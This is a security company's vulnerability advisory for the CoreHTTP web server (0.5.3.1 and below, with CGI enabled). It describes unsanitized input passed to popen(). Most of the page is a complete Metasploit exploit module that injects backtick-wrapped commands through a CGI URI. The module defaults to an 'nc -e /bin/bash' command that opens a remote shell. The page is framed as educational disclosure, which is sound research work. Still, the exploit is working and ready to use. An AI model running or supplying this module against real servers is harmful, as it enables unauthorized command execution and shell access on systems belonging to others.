• Home
• Services
• Labs
• About
• Contact

CoreHTTP Remote Vulnerability

A remote exploitable vulnerability in CoreHTTP server has been uncovered in version 5.3.1 in conjunction with CGI support enabled. The proof of concept code has been written for the Metasploit framework and allow for the execution of arbitrary code on the target host. When coupled with the Metasploit framework, shellcode that would permit a reverse shell is possible. The vulnerability does not yet have a CVE. Be advised, the proof of concept code is for educational purposes only.

Please see the specifics regarding this vulnerability below.

Issue: CoreHTTP server fails to properly sanitize input before calling popen()
and allows an attacker using a standard web browser to execute arbitrary
commands

Package name: CoreHTTP server
Version: 0.5.3.1 and below (as long as cgi support is enabled)
Software URL: http://corehttp.sourceforge.net/

###

## MSF Exploit for CoreHTTP CGI Enabled Remote Arbitrary Command Execution

## CoreHTTP fails to properly sanitize user input before passing it to popen,

## allowing anyone with a web browser to run arbitrary commands.

###

 

require 'msf/core'

 

class Metasploit3 < Msf::Exploit::Remote

 

    include Msf::Exploit::Remote::Tcp

    include Msf::Exploit::Remote::HttpClient

 

    def initialize(info = {})

        super(update_info(info,

            'Name'      => 'corehttp remote command execution',

            'Description'   => %q{

                This module exploits a remote command execution vulnerability in corehttp versions 0.5.3.1 and earlier.

                It requires that you know the name of a cgi file on the server.

                NOTE: If you want to do something more than remote shell, you'll have to change CGICMD

            },

            'Author'    => [ 'Aaron Conole' ],

            'License'   => MSF_LICENSE,

            'Version'   => '$Revision:$',

            'References'    =>

                [

                    [ 'URL', 'http://aconole.brad-x.com/advisories/corehttp.txt' ],

                                        [ 'URL', 'http://corehttp.sourceforge.net' ],

                ],

            'Priviledged'   => false,

            'Payload'   =>

                {

                    'Space'       => 1024,

                },

            'Platform'       => 'php',

            'Arch'           => ARCH_PHP,

            'Targets'        => [[ 'Automatic', { }]],

            'DefaultTarget' => 0))

             

            register_options(

                [

                    OptString.new('CGIURI', [true, "The URI of the CGI file to request", "/foo.pl"]),

                    OptString.new('CGICMD', [true, "The command to execute on the remote machine (note: it doesn't support redirection)", "nc -lvnp 4444 -e /bin/bash&"])

                ], self.class)

 

    end

 

    def exploit

 

        timeout = 0.01

 

        print_status ("Building URI")

 

        uri = ""

        uri = uri.concat(datastore['CGIURI'])

        uri = uri.concat("?%60")

        uri.concat(datastore['CGICMD'])

        uri = uri.gsub(" ", "%20")

        uri.concat("%60")

        uri = uri.gsub("&", "%26")

 

        print_status("Trying URI #{uri}")

 

        response = send_request_raw({ 'uri' => uri}, timeout)

 

        handler

    end

 

end

• Company News
• General
• Industry News
• Research

The content, tools, methodologies and proof of concept code contained in these articles are in no way intended to be used for malicious intent. This information is to be used for educational purposes only. RedTeam Security does not condone the malicious use nor does it warranty the use of any of the content contained herein.

Phone number:
1-612-234-7848

E-mail:

info@redteamsecure.com